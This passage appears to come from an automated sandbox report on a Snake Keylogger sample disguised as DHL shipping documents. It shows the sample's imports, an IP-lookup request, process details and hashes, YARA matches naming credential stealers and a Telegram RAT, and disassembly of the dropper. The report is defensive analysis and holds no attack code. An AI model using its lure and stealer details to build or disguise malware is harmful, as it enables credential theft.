                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.3193.122.6.16849700802039190 02/07/23-18:24:17.350492TCP2039190ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check4970080192.168.2.3193.122.6.168

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Feb 7, 2023 18:24:17.331041098 CET4970080192.168.2.3193.122.6.168
                      Feb 7, 2023 18:24:17.349941015 CET8049700193.122.6.168192.168.2.3
                      Feb 7, 2023 18:24:17.350086927 CET4970080192.168.2.3193.122.6.168
                      Feb 7, 2023 18:24:17.350492001 CET4970080192.168.2.3193.122.6.168
                      Feb 7, 2023 18:24:17.368350029 CET8049700193.122.6.168192.168.2.3
                      Feb 7, 2023 18:24:17.370917082 CET8049700193.122.6.168192.168.2.3
                      Feb 7, 2023 18:24:17.425228119 CET4970080192.168.2.3193.122.6.168
                      Feb 7, 2023 18:25:22.371258020 CET8049700193.122.6.168192.168.2.3
                      Feb 7, 2023 18:25:22.371350050 CET4970080192.168.2.3193.122.6.168
                      Feb 7, 2023 18:25:57.387985945 CET4970080192.168.2.3193.122.6.168
                      Feb 7, 2023 18:25:57.405881882 CET8049700193.122.6.168192.168.2.3

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Feb 7, 2023 18:24:17.263358116 CET5892153192.168.2.38.8.8.8
                      Feb 7, 2023 18:24:17.284573078 CET53589218.8.8.8192.168.2.3
                      Feb 7, 2023 18:24:17.299715996 CET6270453192.168.2.38.8.8.8
                      Feb 7, 2023 18:24:17.320004940 CET53627048.8.8.8192.168.2.3

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Feb 7, 2023 18:24:17.263358116 CET192.168.2.38.8.8.80x6390Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.299715996 CET192.168.2.38.8.8.80x6153Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Feb 7, 2023 18:24:17.284573078 CET8.8.8.8192.168.2.30x6390No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                      Feb 7, 2023 18:24:17.284573078 CET8.8.8.8192.168.2.30x6390No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.284573078 CET8.8.8.8192.168.2.30x6390No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.284573078 CET8.8.8.8192.168.2.30x6390No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.284573078 CET8.8.8.8192.168.2.30x6390No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.284573078 CET8.8.8.8192.168.2.30x6390No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.320004940 CET8.8.8.8192.168.2.30x6153No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                      Feb 7, 2023 18:24:17.320004940 CET8.8.8.8192.168.2.30x6153No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.320004940 CET8.8.8.8192.168.2.30x6153No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.320004940 CET8.8.8.8192.168.2.30x6153No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.320004940 CET8.8.8.8192.168.2.30x6153No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                      Feb 7, 2023 18:24:17.320004940 CET8.8.8.8192.168.2.30x6153No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • checkip.dyndns.org

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349700193.122.6.16880C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      TimestampkBytes transferredDirectionData
                      Feb 7, 2023 18:24:17.350492001 CET102OUTGET / HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                      Host: checkip.dyndns.org
                      Connection: Keep-Alive
                      Feb 7, 2023 18:24:17.370917082 CET102INHTTP/1.1 200 OK
                      Date: Tue, 07 Feb 2023 17:24:17 GMT
                      Content-Type: text/html
                      Content-Length: 103
                      Connection: keep-alive
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 31 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.13</body></html>


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:18:24:09
                      Start date:07/02/2023
                      Path:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      Imagebase:0x400000
                      File size:459101 bytes
                      MD5 hash:CF98F42B9D4BBDC20E54E7E0CA7543C0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Target ID:1
                      Start time:18:24:10
                      Start date:07/02/2023
                      Path:C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m
                      Imagebase:0x1060000
                      File size:133120 bytes
                      MD5 hash:377552A9A2C84B8C55314176A566C079
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 23%, ReversingLabs
                      • Detection: 13%, Virustotal, Browse
                      Reputation:low

                      General

                      Target ID:2
                      Start time:18:24:11
                      Start date:07/02/2023
                      Path:C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                      Imagebase:0x1060000
                      File size:133120 bytes
                      MD5 hash:377552A9A2C84B8C55314176A566C079
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                      Reputation:low

                      General

                      Target ID:12
                      Start time:18:25:30
                      Start date:07/02/2023
                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Imagebase:0x7ff618830000
                      File size:455656 bytes
                      MD5 hash:A267555174BFA53844371226F482B86B
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:13
                      Start time:18:25:30
                      Start date:07/02/2023
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff745070000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:15.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.4%
                        Total number of Nodes:1385
                        Total number of Limit Nodes:25
                        execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 